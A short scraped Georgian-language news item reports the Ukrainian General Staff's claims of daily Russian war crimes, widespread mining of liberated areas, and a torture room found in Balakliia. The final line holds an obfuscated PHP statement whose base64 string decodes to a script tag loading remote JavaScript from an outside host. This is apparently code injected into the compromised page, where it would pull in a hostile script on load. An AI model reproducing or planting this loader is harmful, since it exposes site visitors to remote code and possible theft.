celsiusi
ავერსი საქკაბელი
უკრაინის გენშტაბის ინფორმაციით, ქვეყნის გათავისუფლებულ ტერიტორიებზე ყოველდღიურად რუსი სამხედროების მიერ ჩადენილი 200-მდე ომის დანაშაული ფიქსირდება. 
 
გენშტაბის ცნობით, გათავისუფლებულ ქალაქებსა და სოფლებში ნაღმების საშიშროება კვლავ მაღალია. 10 რაიონში 70 ათასზე მეტი კვადრატული კილომეტრი დანაღმულია საბრძოლო მასალითა და ასაფეთქებელი ნივთიერებებით.
 
"თავდაცვის ძალები იღებენ ზომებს, რათა რაც შეიძლება სწრაფად დაუბრუნდეს მშვიდობიანი ცხოვრება გათავისუფლებულ სოფლებს", - ნათქვამია გენერალური შტაბის განცხადებაში.
 
ცნობისთვის, დეოკუპირებულ ბალაკლეაში, ერთ-ერთ სარდაფში რუსი ოკუპანტების მიერ მოწყობილი წამების ოთახი აღმოაჩინეს. 
471
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");